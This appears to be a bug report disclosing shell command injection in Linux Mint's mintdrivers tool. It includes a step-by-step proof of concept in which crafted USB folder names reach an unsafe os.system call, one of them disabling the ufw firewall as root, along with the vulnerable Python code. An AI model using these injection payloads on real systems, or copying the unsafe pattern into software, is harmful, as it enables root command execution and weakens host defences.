mintdrivers : Shell Command Injection (fake Live Media)

see attached screenshot

Exploit Demo :
a) disconnect from the internet

b) insert a usb-stick wich will be mounted in /media

c) create a folder on the usb-stick with a shell command in the FOLDER NAME like this

$( uname -a > test.txt )

d) create this file in the folder

README.diskdefines

e) run mintdrivers

f) The Shell command in the mount point path will be injected in %s because of the os.system call in mintDrivers.py

g) Another example : A command will run as root and disable the ufw firewall if you create this hidden folder and file on the usb stick :

/media/theregrunner/USB-STICK/test/.";sudo ufw disable;#"/README.diskdefines

---------

Listing of mintDrivers.py

      # Find the live media
      try:
        live_medias = subprocess.check_output("find /media | grep README.diskdefines", shell=True)
        live_medias = str(live_medias, encoding='utf8').split("\n")
        for live_media in live_medias:
          if ("README.diskdefines" in live_media):
            mount_point = live_media.replace("/README.diskdefines", "") # This is where our live DVD is mounted
            # Add it to apt-cdrom
            os.system("sudo apt-cdrom -d \"%s\" -m add" % mount_point)

---------------
OS Information :
theregrunner@mint:~\€ uname -a
Linux mint 3.16.0-38-generic #52~14.04.1-Ubuntu SMP Fri May 8 09:43:57 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
theregrunner@mint:~\€ lsb_release -a
No LSB modules are available.
Distributor ID: LinuxMint
Description: Linux Mint 17.2 Rafaela
Release: 17.2
Codename: rafaela

https://github.com/linuxmint/mintdrivers/issues/18